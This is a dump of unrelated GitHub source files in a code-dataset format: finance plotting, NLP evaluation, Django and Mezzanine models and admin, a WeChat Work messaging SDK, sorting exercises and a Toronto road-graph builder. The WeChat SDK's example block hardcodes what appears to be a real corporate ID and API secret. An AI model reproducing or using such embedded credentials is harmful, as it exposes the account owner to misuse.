Value per share', fontsize = 12,fontweight='bold')\nrng = simu_sht.range(\"at75\")\nsimu_sht.pictures.add(corr8, name = 'corr8', update = True,top = rng.top,left = rng.left)\n\ncorr9 =plt.figure(figsize=(5,5))\nax = corr9.add_subplot(1, 1, 1)\ncorr9.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.scatter(c3_column,price_column,color='#fa621c')\nplt.ylabel('Value per share')\nplt.xlabel('Costs')\nplt.title('Correlation : Costs (Internet services) vs. Value per share', fontsize = 12,fontweight='bold')\nrng = simu_sht.range(\"al100\")\nsimu_sht.pictures.add(corr9, name = 'corr9', update = True,top = rng.top,left = rng.left)\n\ncorr10 =plt.figure(figsize=(5,5))\nax = corr10.add_subplot(1, 1, 1)\ncorr10.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.scatter(c4_column,price_column,color='#fa621c')\nplt.ylabel('Value per share')\nplt.xlabel('Costs')\nplt.title('Correlation : Costs (Others) vs. Value per share', fontsize = 12,fontweight='bold')\nrng = simu_sht.range(\"at100\") \nsimu_sht.pictures.add(corr10, name = 'corr10', update = True,top = rng.top,left = rng.left)\n\ncorr11 =plt.figure(figsize=(5,5))\nax = corr11.add_subplot(1, 1, 1)\ncorr11.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.scatter(betaun_column,price_column,color = '#3691a1')\nplt.ylabel('Value per share')\nplt.xlabel('Beta unlevered')\nplt.title('Correlation : Beta unlevered vs. Value per share', fontsize = 12,fontweight='bold')\nrng = simu_sht.range(\"al125\")\nsimu_sht.pictures.add(corr11, name = 'corr11', update = True,top = rng.top,left = rng.left)\n\ncorr12 =plt.figure(figsize=(5,5))\nax = corr12.add_subplot(1, 1, 1)\ncorr12.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.scatter(roic_column,price_column,color = '#3691a1')\nplt.ylabel('Value per share')\nplt.xlabel('RONIC')\nplt.title('Correlation : RONIC vs. Value per share', fontsize = 12,fontweight='bold')\nrng = simu_sht.range(\"at125\") \nsimu_sht.pictures.add(corr12, name = 'corr12', update = True,top = rng.top,left = rng.left)\n\n\ncorr13 =plt.figure(figsize=(5,5))\nax = corr13.add_subplot(1, 1, 1)\ncorr13.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.scatter(pg_column,price_column,color = '#3691a1')\nplt.ylabel('Value per share')\nplt.xlabel('Perpetual growth rate')\nplt.title('Correlation : Perpetual growth rate vs. Value per share', fontsize = 12,fontweight='bold')\nrng = simu_sht.range(\"al150\") \nsimu_sht.pictures.add(corr13, name = 'corr13', update = True,top = rng.top,left = rng.left)\n\ncorr14 =plt.figure(figsize=(5,5))\nax = corr14.add_subplot(1, 1, 1)\ncorr14.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.scatter(ev_ebitda_column,price_column,color = '#3691a1')\nplt.ylabel('Value per share')\nplt.xlabel('EV/EBITDA')\nplt.title('Correlation : EV/EBITDA vs. Value per share', fontsize = 12,fontweight='bold')\nrng = simu_sht.range(\"at150\") \nsimu_sht.pictures.add(corr14, name = 'corr14', update = True,top = rng.top,left = rng.left)\n\ncorr15 =plt.figure(figsize=(5,5))\nax = corr15.add_subplot(1, 1, 1)\ncorr15.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.scatter(ev_sales_column,price_column,color = '#3691a1')\nplt.ylabel('Value per share')\nplt.xlabel('EV/Sales')\nplt.title('Correlation : EV/Sales vs. 
Value per share', fontsize = 12,fontweight='bold')\nrng = simu_sht.range(\"al175\")\nsimu_sht.pictures.add(corr15, name = 'corr15', update = True,top = rng.top,left = rng.left)\n\ncorr16 =plt.figure(figsize=(5,5))\nax = corr16.add_subplot(1, 1, 1)\ncorr16.patch.set_facecolor('none')\nax.patch.set_facecolor('none')\nplt.scatter(emp_column,price_column,color = '#3691a1')\nplt.ylabel('Value per share')\nplt.xlabel('Equity market premium')\nplt.title('Correlation : Equity market premium vs. Value per share', fontsize = 12,fontweight='bold')\nrng = simu_sht.range(\"at175\") \nsimu_sht.pictures.add(corr16, name = 'corr16', update = True,top = rng.top,left = rng.left)\n\n","repo_name":"keatti/Advanced-Corporate-Finance---Group-2","sub_path":"Monte Carlo Simulation (script).py","file_name":"Monte Carlo Simulation (script).py","file_ext":"py","file_size_in_byte":25648,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"34409614708","text":"from __future__ import annotations\n\nfrom typing import Dict, List, Tuple, Callable\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom .constants import KEYS, CARDINALITIES\n\n\ndef create_initial_results(categories: List[str], keys: List[str]) -> Dict[str, Dict[str, List[float]]]:\n results = {}\n for cat in categories:\n results[cat] = {}\n for key in keys:\n results[cat][key] = []\n return results\n\n\nclass SentenceComparison:\n def __init__(self,\n relations: List[str],\n templater: Callable[[str, str, str], Dict[str, str]],\n metric: Callable,\n mask: str,\n get_relation_meta: Callable,\n keys=None):\n if keys is None:\n keys = KEYS\n self.relations: List[str] = relations\n self.templater: Callable[[str, str, str], Dict[str, str]] = templater\n self.metric: Callable = metric\n self.mask: str = mask\n self.keys: List[str] = keys\n self.results: Dict = create_initial_results(self.relations, self.keys)\n self.total_result: Dict[str, List[float]] = {key: [] for key in self.keys}\n self.cardinality_result: Dict = create_initial_results(CARDINALITIES, self.keys)\n self.get_relation_meta: Callable[[str], str] = get_relation_meta\n\n\n def compare(self, triples: Dict[str, List[Tuple[str, str]]]):\n for relation in self.relations:\n for sub, obj in tqdm(triples[relation]):\n sentences: Dict[str, str] = self.templater(relation, sub, self.mask)\n for key in self.keys:\n res: float = self.metric(sentences[key], obj)\n card: str = self.get_relation_meta(relation).split(\" \")[-1]\n self.results[relation][key].append(res)\n self.cardinality_result[card][key].append(res)\n self.total_result[key].append(res)\n\n def plot_comparison_for_relation(self, relation: str, title: str):\n fig, ax = plt.subplots()\n ax.set(xlabel='triplet nr.', ylabel=title, title=title)\n\n ax.set_title(f\"{relation}:{self.get_relation_meta(relation)}\")\n\n for index, (key, dataset) in enumerate(self.results[relation].items()):\n x_data: List[int] = list(range(len(dataset)))\n ax.scatter(x_data, dataset, marker=str((index % 4) + 1), label=f\"{key}\")\n\n ax.legend(loc='upper right')\n plt.show()\n\n def make_global_comparison(self) -> List[List[str]]:\n rows: List[List[str]] = []\n for relation in self.relations:\n means: List[float] = [np.mean(self.results[relation][key]).item() for key in self.keys]\n row: List[str] = [relation] + [\"{:.3f}\".format(mean) for mean in means]\n rows.append(row)\n return rows\n\n def print_global_for_latex(self):\n rows: List[List[str]] = self.make_global_comparison()\n 
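# order rows numerically by relation id: int(lst[0][1:]) assumes ids of the form \"P19\",\n        # so that \"P3\" sorts before \"P101\" in the printed LaTeX table\n        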
rows = sorted(rows, key=lambda lst: int(lst[0][1:]))\n        for row in rows:\n            print(\" & \".join(row) + \"\\\\\\\\\")\n\n    def plot_heat_map(self, metric: Callable, title: str):\n\n        heat_values: np.ndarray = np.array(\n            [[metric(self.total_result[left_key], self.total_result[right_key])\n              for left_key in self.keys] for right_key in self.keys])\n\n        fig, ax = plt.subplots()\n        ax.imshow(heat_values)\n\n        plt.setp(ax.get_xticklabels(), rotation=45, ha=\"right\", rotation_mode=\"anchor\")\n\n        ax.set_xticks(np.arange(len(self.keys)), labels=self.keys)\n        ax.set_yticks(np.arange(len(self.keys)), labels=self.keys)\n\n        for row in range(len(self.keys)):\n            for col in range(len(self.keys)):\n                ax.text(col, row, heat_values[row, col], ha=\"center\", va=\"center\", color=\"w\")\n\n        ax.set_title(title)\n        plt.show()\n\n    def results_for_persistence(self) -> List[Tuple[str, None | str, float]]:\n        rows: List[Tuple[str, None | str, float]] = []\n\n        for key in self.keys:\n            key_mean: float = np.mean(self.total_result[key]).item()\n            if not np.isnan(key_mean):\n                rows.append((key, None, key_mean))\n\n            for card in CARDINALITIES:\n                card_mean: float = np.mean(self.cardinality_result[card][key]).item()\n                if not np.isnan(card_mean):\n                    rows.append((key, card, card_mean))\n\n            for rel in self.relations:\n                rel_mean: float = np.mean(self.results[rel][key]).item()\n                if not np.isnan(rel_mean):\n                    rows.append((key, rel, rel_mean))\n\n        return rows\n","repo_name":"Thrasolt/ContextualKnowledgeOfLMs","sub_path":"SyntaxTransformation/SentenceComparison/SentenceComparison.py","file_name":"SentenceComparison.py","file_ext":"py","file_size_in_byte":4644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"23475851464","text":"from pprint import pprint\nfrom oauth2client.service_account import ServiceAccountCredentials\n\nimport httplib2\nimport googleapiclient\nfrom googleapiclient import discovery\n\nCREDENTIALS_FILE = 'creds.json'\nspreadsheet_id = \"119zT2AFXdJvJHPrd5PR1sCpnU8NMNk5S\"\n\ncredentials = ServiceAccountCredentials.from_json_keyfile_name(\n    CREDENTIALS_FILE,\n    'https://www.googleapis.com/auth/spreadsheets')\nhttpAuth = credentials.authorize(httplib2.Http())\nservice = googleapiclient.discovery.build('sheets', 'v4', http=httpAuth)\n\nvalues = service.spreadsheets().values().get(\n    spreadsheetId=spreadsheet_id,\n    range='B1:E10',\n    majorDimension='ROWS')\nresponse = values.execute()\npprint(response)\n","repo_name":"writeln2012/Newton.by","sub_path":"google_sheets.py","file_name":"google_sheets.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"34999588198","text":"# -*- coding: utf-8 -*-\nimport re\nfrom lxml import etree\n\nclass PossibleGroupFinder(object):\n\n    def __init__(self, xml=None, db_config=None):\n        if not xml and not db_config:\n            raise Exception(\"Path to neither xml dump nor config.json provided\")\n\n        if xml:\n            self._finder = XMLGroupFinder(xml)\n        else:\n            self._finder = DBGroupFinder(db_config)\n\n    def find(self, pattern):\n        return self._finder.find(pattern)\n\n\nclass XMLGroupFinder(object):\n\n    class Finder(object):\n\n        def __init__(self, pattern):\n            self._reset()\n            self.found = []\n\n            self.pattern = []\n            assert isinstance(pattern, (tuple, list))\n            if len(pattern) < 2:\n                raise Exception(\"Too short pattern provided\")\n            for el in pattern:\n                self.pattern.append(re.compile(el, re.I))\n\n        def _reset(self):\n            self.context = []\n            self.sent_id = None\n            
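# raw text of the current sentence, accumulated from the <source> element's character data\n            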
self.sent_fulltext = ''\n self.in_source = False\n\n def start(self, tag, attr):\n if tag == 'token':\n self.context.append((int(attr['id']), attr['text'].encode('utf-8')))\n elif tag == 'sentence':\n self.sent_id = int(attr['id'])\n elif tag == 'source':\n self.in_source = True\n\n def data(self, data):\n if self.in_source:\n self.sent_fulltext += data.encode('utf-8')\n\n def end(self, tag):\n if tag == 'sentence':\n self._reset()\n elif tag == 'token':\n self.check_current_context()\n elif tag == \"source\":\n self.in_source = False\n\n def close(self):\n pass\n\n def check_current_context(self):\n length = len(self.pattern)\n if len(self.context) < length:\n return\n for i, el in enumerate(self.pattern):\n if not re.match(el, self.context[i - length][1]):\n return\n # context matched\n self.found.append(PossibleGroup(\n [x[0] for x in self.context[-length:]],\n [x[1] for x in self.context[-length:]],\n self.sent_id,\n self.sent_fulltext\n ))\n\n \n def __init__(self, xml_path):\n self.xml_path = xml_path\n\n def find(self, pattern):\n \"\"\" returns a list of tuples of token ids \"\"\"\n finder = self.Finder(pattern)\n parser = etree.XMLParser(target = finder)\n etree.parse(self.xml_path, parser)\n return finder.found\n\n\nclass PossibleGroup(object):\n \n def __init__(self, ids, tokens, sentence_id, sentence_fulltext):\n self.ids = tuple(ids)\n self.tokens = tokens\n self.sentence_id = sentence_id\n self.sentence_fulltext = sentence_fulltext\n\n def __repr__(self):\n return 'PossibleGroup([{0}], \"{1}\", sentence_id = {2}, sentence_fulltext = \"{3}\")'.format(\n ','.join(map(str, self.ids)),\n ' '.join(self.tokens),\n self.sentence_id,\n self.sentence_fulltext\n )\n","repo_name":"OpenCorpora/opencorpora","sub_path":"python/Syntax.py","file_name":"Syntax.py","file_ext":"py","file_size_in_byte":3184,"program_lang":"python","lang":"en","doc_type":"code","stars":234,"dataset":"github-code","pt":"37"} +{"seq_id":"30157192766","text":"\nfrom hermetic.core.presenter import Presenter\n\nclass ScriptPresenter(Presenter):\n def present(self, agent):\n print(agent.greet())\n while True:\n print('> ', end='')\n inp = input()\n for word in agent.process_input(inp):\n print(word, end='')\n print()","repo_name":"anyscale/hermetic","sub_path":"src/hermetic/presenters/script_presenter.py","file_name":"script_presenter.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"32096811823","text":"\nfrom copy import deepcopy\n\nfrom django.contrib import admin\nfrom django.core.exceptions import PermissionDenied\nfrom django.core.urlresolvers import NoReverseMatch\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import get_object_or_404\n\nfrom mezzanine.pages.models import Page, RichTextPage, Link\nfrom mezzanine.core.admin import DisplayableAdmin\nfrom mezzanine.utils.urls import admin_url\n\n\npage_fieldsets = deepcopy(DisplayableAdmin.fieldsets)\npage_fieldsets[0][1][\"fields\"] += ((\"in_navigation\", \"in_footer\"),\n \"login_required\",)\n\n\nclass PageAdmin(DisplayableAdmin):\n \"\"\"\n Admin class for the ``Page`` model and all subclasses of\n ``Page``. 
Handles redirections between admin interfaces for the\n ``Page`` model and its subclasses.\n \"\"\"\n\n fieldsets = page_fieldsets\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n For ``Page`` subclasses that are registered with an Admin class\n that doesn't implement fieldsets, add any extra model fields\n to this instance's fieldsets. This mimics Django's behaviour of\n adding all model fields when no fieldsets are defined on the\n Admin class.\n \"\"\"\n super(PageAdmin, self).__init__(*args, **kwargs)\n # Test that the fieldsets don't differ from PageAdmin's.\n if self.model is not Page and self.fieldsets == PageAdmin.fieldsets:\n # Make a copy so that we aren't modifying other Admin\n # classes' fieldsets.\n self.fieldsets = deepcopy(self.fieldsets)\n # Insert each field between the publishing fields and nav\n # fields. Do so in reverse order to retain the order of\n # the model's fields.\n for field in reversed(self.model._meta.fields):\n if field not in Page._meta.fields and field.name != \"page_ptr\":\n self.fieldsets[0][1][\"fields\"].insert(3, field.name)\n\n def in_menu(self):\n \"\"\"\n Hide subclasses from the admin menu.\n \"\"\"\n return self.model is Page\n\n def _check_permission(self, request, page, permission):\n \"\"\"\n Runs the custom permission check and raises an\n exception if False.\n \"\"\"\n if not getattr(page, \"can_\" + permission)(request):\n raise PermissionDenied\n\n def add_view(self, request, extra_context=None, **kwargs):\n \"\"\"\n For the ``Page`` model, redirect to the add view for the\n ``RichText`` model.\n \"\"\"\n if self.model is Page:\n try:\n add_url = admin_url(RichTextPage, \"add\")\n return HttpResponseRedirect(add_url)\n except NoReverseMatch:\n pass\n return super(PageAdmin, self).add_view(request, **kwargs)\n\n def change_view(self, request, object_id, extra_context=None):\n \"\"\"\n For the ``Page`` model, check ``page.get_content_model()``\n for a subclass and redirect to its admin change view.\n Also enforce custom change permissions for the page instance.\n \"\"\"\n page = get_object_or_404(Page, pk=object_id)\n content_model = page.get_content_model()\n self._check_permission(request, content_model, \"change\")\n if self.model is Page:\n if content_model is not None:\n change_url = admin_url(content_model.__class__, \"change\",\n content_model.id)\n return HttpResponseRedirect(change_url)\n extra_context = extra_context or {}\n extra_context[\"hide_delete_link\"] = not page.can_delete(request)\n extra_context[\"hide_slug_field\"] = page.overridden()\n return super(PageAdmin, self).change_view(request, object_id,\n extra_context=extra_context)\n\n def delete_view(self, request, object_id, extra_context=None):\n \"\"\"\n Enforce custom delete permissions for the page instance.\n \"\"\"\n page = get_object_or_404(Page, pk=object_id)\n content_model = page.get_content_model()\n self._check_permission(request, content_model, \"delete\")\n return super(PageAdmin, self).delete_view(request, object_id,\n extra_context)\n\n def changelist_view(self, request, extra_context=None):\n \"\"\"\n Redirect to the ``Page`` changelist view for ``Page``\n subclasses.\n \"\"\"\n if self.model is not Page:\n return HttpResponseRedirect(admin_url(Page, \"changelist\"))\n return super(PageAdmin, self).changelist_view(request, extra_context)\n\n def save_model(self, request, obj, form, change):\n \"\"\"\n Set the ID of the parent page if passed in via querystring.\n \"\"\"\n # Force parent to be saved to trigger handling of ordering and slugs.\n parent = 
request.GET.get(\"parent\")\n if parent is not None and not change:\n obj.parent_id = parent\n obj._order = None\n obj.slug = None\n obj.save()\n super(PageAdmin, self).save_model(request, obj, form, change)\n\n def _maintain_parent(self, request, response):\n \"\"\"\n Maintain the parent ID in the querystring for response_add and\n response_change.\n \"\"\"\n location = response._headers.get(\"location\")\n parent = request.GET.get(\"parent\")\n if parent and location and \"?\" not in location[1]:\n url = \"%s?parent=%s\" % (location[1], parent)\n return HttpResponseRedirect(url)\n return response\n\n def response_add(self, request, obj):\n \"\"\"\n Enforce page permissions and maintain the parent ID in the\n querystring.\n \"\"\"\n response = super(PageAdmin, self).response_add(request, obj)\n return self._maintain_parent(request, response)\n\n def response_change(self, request, obj):\n \"\"\"\n Enforce page permissions and maintain the parent ID in the\n querystring.\n \"\"\"\n response = super(PageAdmin, self).response_change(request, obj)\n return self._maintain_parent(request, response)\n\n\n# Drop the meta data fields, and move slug towards the stop.\nlink_fieldsets = deepcopy(page_fieldsets[:1])\nlink_fieldsets[0][1][\"fields\"] = link_fieldsets[0][1][\"fields\"][:-1]\nlink_fieldsets[0][1][\"fields\"].insert(1, \"slug\")\n\n\nclass LinkAdmin(PageAdmin):\n\n fieldsets = link_fieldsets\n\n def formfield_for_dbfield(self, db_field, **kwargs):\n \"\"\"\n Make slug mandatory.\n \"\"\"\n if db_field.name == \"slug\":\n kwargs[\"required\"] = True\n return super(LinkAdmin, self).formfield_for_dbfield(db_field, **kwargs)\n\n\nadmin.site.register(Page, PageAdmin)\nadmin.site.register(RichTextPage, PageAdmin)\nadmin.site.register(Link, LinkAdmin)\n","repo_name":"zhiwehu/my_mezzanine","sub_path":"env/lib/python2.7/site-packages/mezzanine/pages/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":6849,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"30514290269","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport json\n\nimport requests\n\nfrom .exception import WeChatWorkSDKException\nfrom .mixin import ValidationMixin\n\n# 企业微信API根URL\n# WECHATWORK_API_ROOT_URL = os.environ.get('WECHATWORK_API_ROOT_URL', 'https://qyapi.weixin.qq.com/cgi-bin')\nWECHATWORK_API_ROOT_URL = os.environ.get('WECHATWORK_API_ROOT_URL', 'https://qywxlocal.nesc.cn:7443/cgi-bin')\n\n\ndef get_access_token(corpid, secret) -> (str, int):\n \"\"\"\n 获取Access Token\n :param corpid: 企业ID\n :param secret: 应用密钥\n :return: (access_token, expires_in)\n - access_token: 获取到的凭证,最长为512字节\n - expires_in: 凭证的有效时间(秒),通常为7200\n \"\"\"\n url = f'{WECHATWORK_API_ROOT_URL}/gettoken?corpid={corpid}&corpsecret={secret}'\n data = json.loads(requests.get(url).content)\n if int(data['errcode']) == 0:\n return data['access_token'], int(data['expires_in'])\n else:\n raise WeChatWorkSDKException(data['errcode'], data['errmsg'])\n\n\nclass WeChatWorkSDK(ValidationMixin):\n \"\"\"\n 企业微信SDK基本类\n \"\"\"\n API_ROOT_URL = WECHATWORK_API_ROOT_URL\n\n def __init__(self, corpid, secret):\n \"\"\"\n :param corpid:\n :param secret:\n \"\"\"\n self.corpid = corpid\n self.secret = secret\n self._access_token = None\n\n @property\n def access_token(self):\n \"\"\"\n 获取access_token\n 详细说明:https://work.weixin.qq.com/api/doc/90000/90135/91039\n\n :return access_token: str\n \"\"\"\n # 新创建的实例或者access_token过期,请求access_token并缓存\n if self._access_token is None:\n access_token, expires_in = 
get_access_token(corpid=self.corpid, secret=self.secret)\n self._access_token = access_token\n return self._access_token\n\n def _clean_cached_access_token(self):\n self._access_token = None\n\n def request_api(self, method, api, query_params=None, data=None):\n # 拼接API的URL\n url = self.API_ROOT_URL + api\n\n # 默认必须传入access_token\n if query_params is None:\n query_params = dict()\n query_params['access_token'] = self.access_token\n\n # API接口要求必须以JSON格式传入数据\n content = requests.request(method, url, params=query_params, json=data).content\n if not content:\n raise WeChatWorkSDKException('self-defined', 'API接口不存在')\n return_data = json.loads(content)\n\n # 处理access_token过期\n if int(return_data['errcode']) == 42001:\n # 清空缓存的access_token\n self._clean_cached_access_token()\n # 重新请求\n return self.request_api(method, api, query_params, data)\n\n # 抛出异常\n if int(return_data['errcode']) != 0:\n raise WeChatWorkSDKException(return_data['errcode'], return_data['errmsg'])\n\n # 返回正常数据时删除errcode=0和errmsg='ok'\n return_data.pop('errcode')\n return_data.pop('errmsg')\n return return_data\n\n def get_api(self, api, query_params=None):\n return self.request_api('GET', api, query_params)\n\n def post_api(self, api, query_params=None, data=None):\n return self.request_api('POST', api, query_params, data)\n\n ########################自定义\n def _send(self, data=None):\n if data is None:\n data = {\n \"touser\": \"7683\",\n\n \"msgtype\": \"text\",\n \"agentid\": 1000041,\n \"text\": {\n \"content\": \"🐅\"\n },\n \"safe\": 0,\n \"enable_id_trans\": 0,\n \"enable_duplicate_check\": 0\n }\n\n url = f'{self.API_ROOT_URL}/message/send?access_token={self.access_token}'\n return requests.post(url, json=data)\n\n def send_file(self, path, type='file', touser=\"7605|7683\", agentid=1000041):\n upload_media_url = f\"{self.API_ROOT_URL}/media/upload?access_token={self.access_token}&type={type}\"\n\n with open(path, 'rb') as f:\n files = {'data': f}\n response = requests.post(upload_media_url, files=files)\n try:\n media_id = response.json()['media_id']\n\n data = {\n \"touser\": touser, # \"@all\"\n\n \"msgtype\": type,\n \"agentid\": agentid,\n type: {\n \"media_id\": media_id\n },\n \"safe\": 0,\n \"enable_id_trans\": 0,\n \"enable_duplicate_check\": 0\n }\n\n return self._send(data)\n\n except Exception as e:\n print(e)\n return response.json()\n\n\nif __name__ == '__main__':\n from wecom import WeChatWorkSDK\n\n we = WeChatWorkSDK('ww3c6024bb94ecef59x', 'empKNMx-RSgd4tK6uzVA56qCl1QY6eErRdSb7Hr5vyQ')\n we.send_file(\"/Users/yuanjie/Desktop/111.jpeg\", touser='@all', type='image')\n","repo_name":"yuanjie-ai/wecom","sub_path":"wecom/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43398623551","text":"from api import exceptions as exc\nfrom core.models import StatsBaseModel\nfrom django.db import models\nfrom users.models import Patient\n\n\nclass StatType(StatsBaseModel):\n \"\"\"Типы показателей\"\"\"\n\n FLOAT = 'float'\n INT = 'int'\n\n TYPES = (\n (FLOAT, 'Число с плавающей точкой'),\n (INT, 'Целое число'),\n )\n\n slug = models.SlugField(\n verbose_name='Уникальное название',\n max_length=32,\n unique=True\n )\n name = models.CharField(\n verbose_name='Наименование',\n max_length=120\n )\n description = models.TextField(\n verbose_name='Описание',\n max_length=512,\n blank=True,\n null=True\n )\n data_type = models.CharField(\n verbose_name='Тип данных',\n choices=TYPES,\n 
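# holds the short slug defined in TYPES ('float' or 'int'), hence the small max_length\n        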
max_length=10,\n default=FLOAT\n )\n min_value = models.FloatField(\n verbose_name='Минимальное значение'\n )\n max_value = models.FloatField(\n verbose_name='Максимальное значение'\n )\n important = models.BooleanField(\n verbose_name='Важное значение',\n default=False,\n blank=True\n )\n\n class Meta:\n verbose_name = 'Тип данных'\n verbose_name_plural = 'Типы данных'\n\n def __str__(self):\n return f'{self.name}'\n\n\nclass Stat(StatsBaseModel):\n \"\"\"Показатели здоровья\"\"\"\n patient = models.ForeignKey(\n Patient,\n verbose_name='Пациент',\n related_name='stats',\n on_delete=models.CASCADE\n )\n type = models.ForeignKey(\n StatType,\n related_name='values',\n verbose_name='Тип',\n on_delete=models.CASCADE\n )\n data = models.FloatField(\n verbose_name='Показатель'\n )\n\n class Meta:\n verbose_name = 'Статистика'\n verbose_name_plural = 'Статистика'\n\n def __str__(self):\n return f'{self.type}: {self.data}'\n\n def save(self, *args, **kwargs):\n stat = self.data\n min_value = self.type.min_value\n max_value = self.type.max_value\n if (stat < min_value or stat > max_value):\n raise exc.StatIncorrectValueException\n super().save(*args, **kwargs)\n\n\nclass Note(StatsBaseModel):\n \"\"\"Заметки\"\"\"\n patient = models.ForeignKey(\n Patient,\n related_name='notes',\n verbose_name='Пациент',\n on_delete=models.CASCADE\n )\n text = models.TextField(\n verbose_name='Текст',\n max_length=512\n )\n\n class Meta:\n verbose_name = 'Заметки'\n verbose_name_plural = 'Заметки'\n\n def __str__(self):\n return f'{self.text[:24]}'\n\n\nclass Location(StatsBaseModel):\n \"\"\"Местоположение\"\"\"\n patient = models.ForeignKey(\n Patient,\n related_name='locations',\n verbose_name='Пациент',\n on_delete=models.CASCADE\n )\n latitude = models.FloatField(\n verbose_name='Широта'\n )\n longitude = models.FloatField(\n verbose_name='Долгота'\n )\n\n class Meta:\n verbose_name = 'Местоположение'\n verbose_name_plural = 'Местоположение'\n\n def __str__(self):\n return f'{self.latitude}, {self.longitude}'\n\n\nclass Weather(StatsBaseModel):\n \"\"\"Погода\"\"\"\n # IN FUTURE\n # location = models.ForeignKey(\n # Location,\n # verbose_name='Местоположение',\n # related_name='weathers',\n # on_delete=models.CASCADE\n # )\n code = models.IntegerField(\n verbose_name='Вид осадков'\n )\n temp = models.FloatField(\n verbose_name='Температура по Цельсию'\n )\n pressure = models.PositiveIntegerField(\n verbose_name='Атмосферное давление'\n )\n humidity = models.PositiveBigIntegerField(\n verbose_name='Влажность воздуха %'\n )\n\n class Meta:\n verbose_name = 'Погода'\n verbose_name_plural = 'Погода'\n\n def __str__(self):\n return f'{self.temp} C, {self.pressure} р/с, {self.humidity}%'\n","repo_name":"AleksandrUsolcev/filin-mate","sub_path":"filin_mate/stats/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4304,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"13926111990","text":"def quick_sort(array, start, end):\n if start >= end:\n return\n pivot = start\n left = start + 1\n right = end\n while (left <= right):\n while (left <= end and array[left] <= array[pivot]):\n left += 1\n while (right > start and array[right] >= array[pivot]):\n right -= 1\n if (left > right):\n array[right], array[pivot] = array[pivot], array[right]\n else:\n array[left], array[right] = array[right], array[left]\n\n quick_sort(array, start,right -1)\n quick_sort(array, right+1, end)\n\nT = int(input())\nfor tc in range(1, T+1):\n N = int(input())\n lst 
= list(map(int, input().split()))\n quick_sort(lst, 0, N-1)\n print(f'#{tc} {lst[N//2]}')","repo_name":"seongbiny/algorithm","sub_path":"SWEA/5205.py","file_name":"5205.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"26216358842","text":"from opendp.mod import enable_features\nimport opendp.prelude as dp\n\nenable_features(\"floating-point\", \"contrib\")\n\n\ndef test_quantile_score_candidates():\n\n input_domain = dp.vector_domain(dp.atom_domain(T=int))\n input_metric = dp.symmetric_distance()\n candidates = [20, 33, 40, 50, 72, 100]\n quant_trans = dp.t.make_quantile_score_candidates(input_domain, input_metric, candidates, alpha=0.5)\n\n print(quant_trans(list(range(100))))\n\n expo_meas = dp.m.then_report_noisy_max_gumbel(1000., \"min\")\n\n quantile_meas = quant_trans >> expo_meas\n idx = quantile_meas(list(range(100)))\n print(candidates[idx])\n\n assert quantile_meas.map(1) >= 0.1\n","repo_name":"opendp/opendp","sub_path":"python/test/integration/test_quantile.py","file_name":"test_quantile.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":240,"dataset":"github-code","pt":"37"} +{"seq_id":"33480359677","text":"# Gera gráfico de estradas (excluindo rotas) na cidade de Toronto e municípios vizinhos.\r\n\r\n# Imports\r\nimport pickle\r\nimport networkx\r\nimport shapefile\r\nfrom haversine import haversine\r\n\r\npath = './toronto_shapefiles'\r\ncl_sf = shapefile.Reader(path + \"/centreline_wgs84/CENTRELINE_WGS84\")\r\ncli_sf = shapefile.Reader(path + \"/centreline_intersection_wgs84/CENTRELINE_INTERSECTION_WGS84\")\r\ncl_inclusion_list = [201200, 201201, 201300, 201301, 201400, 201401, 201500, 201600, 201601, 201700, 201800]\r\n\r\n# Define o grafo\r\nG = networkx.Graph()\r\n\r\ndef get_cl_length(points):\r\n return sum([haversine((points[i][1], points[i][0]), (points[i+1][1], points[i+1][0])) for i in range(len(points)-1)])\r\n\r\nfor shapeRecord in cl_sf.iterShapeRecords():\r\n if shapeRecord.record[13] in cl_inclusion_list:\r\n w = get_cl_length(shapeRecord.shape.points)\r\n G.add_edge(shapeRecord.record[11], shapeRecord.record[12], weight=w, record=shapeRecord.record, shape=shapeRecord.shape.points)\r\n\r\nfor record in cli_sf.iterRecords():\r\n G.node[record[0]] = record\r\n\r\npickle.dump(G, open('mapas/roadgraph.p', 'wb'))","repo_name":"ghmc91/shortest_path_toronto","sub_path":"02-pickleroadgraph.py","file_name":"02-pickleroadgraph.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42724208333","text":"def quickSort(alist):\n quickSortHelper(alist, 0, len(alist) - 1)\n\n\ndef quickSortHelper(alist, first, last):\n if first < last:\n # 右指针\n splitpoint = partition(alist, first, last)\n # 根据中值分两半的左半部分递归\n quickSortHelper(alist, first, splitpoint - 1)\n # 根据中值分两半的右半部分递归\n quickSortHelper(alist, splitpoint + 1, last)\n\n\n# partition另一种方法\n# 左指针-1,右指针0\n# 左指针-1时,右指针<中值,则左指针、右指针都+1\n# 右指针>中值,则右指针+1\n# 